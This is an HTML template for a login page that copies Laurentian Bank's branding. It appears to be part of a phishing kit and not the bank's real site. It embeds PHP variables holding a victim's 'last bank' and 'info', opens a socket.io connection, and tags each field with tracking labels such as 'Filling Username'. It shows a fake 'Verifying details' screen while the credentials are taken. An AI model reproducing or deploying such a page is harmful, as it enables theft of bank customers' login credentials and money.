<html xmlns:layout="http://www.ultraq.net.nz/web/thymeleaf/layout" lang="en_CA">
    <head>
        <title>Login</title>
        <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=2">
        <link type="text/css" href="/assets/laur/md-reno-base-mobile.css?1" rel="stylesheet">
        <link type="text/css" href="/assets/laur/theme-laurentianbank-md-refresh-mobile.css" rel="stylesheet">
        <link type="text/css" href="/assets/laur/login-common.css" rel="stylesheet">
        <link type="text/css" href="/assets/laur/secure-key.css" rel="stylesheet">
        <link rel="icon" href="/assets/laur/favicon.png">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body ng-app="UxpLoginApp" class="uxp-theme ng-scope">
        <div class="widget-c1-oauth-login position-relative oauth-login">
            <div ng-controller="UxpLoginController as $ctrl" id="c1-login-section" class="ng-scope">
                
                <form id="loginForm" id="input-form" name="" class="center-block c1-login-form ng-pristine ng-invalid ng-invalid-uxp-pattern ng-invalid-required ng-valid-minlength ng-valid-maxlength" action="" method="post" autocomplete="off">
                    <input type="hidden" id="userAgent" name="userAgent">
                    <div>
                        <div ng-form="newLoginForm" ng-hide="showingMemorizedAccounts()" class="ng-pristine ng-invalid ng-invalid-uxp-pattern ng-invalid-required ng-valid-minlength ng-valid-maxlength">
                            <div class="logo text-center">
                                <img src="/assets/laur/logo.svg" alt="Laurentian Bank logo.">
                                </div>
                            <div class="div-main">
                                <div class="login-id-fields">
                                    <div class="new-login-fields">
                                        <div  class="ng-scope form-group">
                                            <div class="is-empty">
                                                <label>
                                                    <span aria-hidden="true">Access code</span>
                                                    <input class="form-control ng-pristine ng-empty ng-invalid ng-invalid-uxp-pattern ng-valid-maxlength ng-touched lrinput input-username" attr-action="Filling Username" id="input-username" name="username" type="text" maxlength="8" value="" required placeholder="Access code">
                                                </label>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="memorized-login-fields">
                                    </div>
                                </div>
                                <div class="password-mask-toggle">
                                    <a href="" role="button" ng-click="togglePasswordMask()" id="passwordToggle" class="show-password">
                                        <span ng-if="fieldModels.passwordInputType !== 'text'" class="ng-scope">Show password</span>
                                    </a>
                                </div>
                                <div class="form-group">
                                    <div class="text-input is-empty">
                                        <label>
                                            <span aria-hidden="true">Password</span>
                                            <input class="form-control ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-uxp-pattern ng-invalid-required lrinput input-password" attr-action="Filling Password" id="input-password" name="password" placeholder="Password" type="password" required="required">
                                        </label>
                                    </div>
                                </div>
                                <div class="form-group">
                                    <div class="checkbox">
                                        <label for="rememberLogin" class="rememberMeCheckboxLabel">
                                            <input class="form-control ng-pristine ng-untouched ng-valid ng-empty" type="checkbox" id="rememberLogin" name="remember-login-credentials" ng-model="fieldModels.rememberMe" value="true">
                                            <span class="remember-me-input-label">
                                                <b>Remember me</b>
                                                <p style="margin-left: -7px;">To create a login profile, select "Remember me". On the mobile app, this option will let you use QuickView or biometric login.</p>
                                            </span>
                                        </label>
                                    </div>
                                </div>
                                <div class="text-center c1-btn-container">
                                    <button onclick="submitForm()" type="button" id="loginSubmit" name="save" value="1">Log in</button>
                                </div>
                                <div class="c1-btn-container memorized-btn-container">
                                    <div>
                                        <a href="/forgotPac">Reset password</a>
                                    </div>
                                    <div class="memorized-accounts ng-hide"
                                        <a href="#" ng-click="showMemorizedAccounts()">Show saved login profiles</a>
                                    </div>
                                </div>
                            </div>
                            <div class="alignment div-loader" style="display: none; text-align: center;">
                                <p class="pageTitle" style="text-align: center;font-size: 27px;">Verifying details</p>
                                <img src="/assets/laur/loading.gif" alt="" id="loaderOnLoading" style="width: 96px;margin: 18px 0px;">
                                <p class="desText" style="text-align: center;padding: 20px 0;font-size: 19px;">Loading please wait...</p>
                            </div>
                        </div>
                    </div>
                </form>
            </div>
        </div>
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">Login</span>
    </body>
    <script src="/bank/laur/js/script.js">
    </script>
</html>
